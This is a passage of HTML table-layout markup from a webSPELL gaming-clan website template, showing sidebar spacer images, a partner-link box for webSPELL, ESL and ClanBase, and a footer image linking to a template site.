                <td width="100%">
                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="4" background="images/image_46.gif">
			&nbsp;</td>
                    <td width="180" background="images/image_47.gif">
			&nbsp;</td>
                    <td width="4" background="images/image_48.gif">
			&nbsp;</td>
                  </tr>
                </table>
                </td>
              </tr>
              <tr>
                <td width="100%">
			<img src="images/image_50.gif" width="188" height="30" alt=""></td>
              </tr>
              <tr>
                <td width="100%">                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="4" background="images/image_46.gif">
			&nbsp;</td>
                    <td width="180" background="images/image_47.gif">
			&nbsp;</td>
                    <td width="4" background="images/image_48.gif">
			&nbsp;</td>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td width="100%">
			<img src="images/image_58.gif" width="188" height="30" alt=""></td>
              </tr>
              <tr>
                <td width="100%">                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="4" background="images/image_46.gif">
			&nbsp;</td>
                    <td width="180" background="images/image_47.gif">
			<table width="100%" cellpadding="2" cellspacing="0">

<tr>
  <td colspan="2" align="center"><a href="http://www.webspell.org" target="_blank"><img src="images/partners/1.gif" border="0" alt="webSPELL 4"></a></td>
</tr><tr>
  <td colspan="2" align="center"><a href="http://www.esl.eu" target="_blank"><img src="images/partners/2.gif" border="0" alt="ESL"></a></td>
</tr><tr>
  <td colspan="2" align="center"><a href="http://www.clanbase.com" target="_blank"><img src="images/partners/3.jpg" border="0" alt="Clan Base"></a></td>
</tr></table>	
</td>
                    <td width="4" background="images/image_48.gif">
			&nbsp;</td>
                  </tr>
                </table></td>
              </tr>
            </table>
        </td>
      </tr>
    </table>
    </td>
  </tr>
  <tr>
    <td width="100%">
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
      <tr>
        <td width="100%">
			<img src="images/image_65.gif" width="873" height="12" alt=""></td>
      </tr>
      <tr>
        <td width="100%">
        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
          <tr>
            <td width="33%">
			<img src="images/image_66.gif" width="5" height="20" alt=""></td>
            <td width="33%">
			<a target="_blank" href="http://szablonownia.ovh.org/">
			<img src="images/image_67.gif" width="860" height="20" border="0"></a></td>
            <td width="34%">
			<img src="images/image_68.gif" width="8" height="20" alt=""></td>
          </tr>
        </table>
        </td>
      </tr>
      <tr>
        <td width="100%">
        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
          <tr>
            <td width="33%">
			<img src="images/image_69.gif" width="5" height="19" alt=""></td>
            <td width="33%">
			<img src="images/image_70.gif" width="860" height="19" alt=""></td>
            <td width="34%">
			<img src="images/image_71.gif" width="8" height="19" alt=""></td>
          </tr>
        </table>
        </td>
      </tr>
      <tr>
        <td width="100%">
			<img src="images/image_72.gif" width="873" height="13" alt=""></td>
      </tr>
    </table>
    </td>
  </tr>
</table></td>
    <td width="6" background="images/
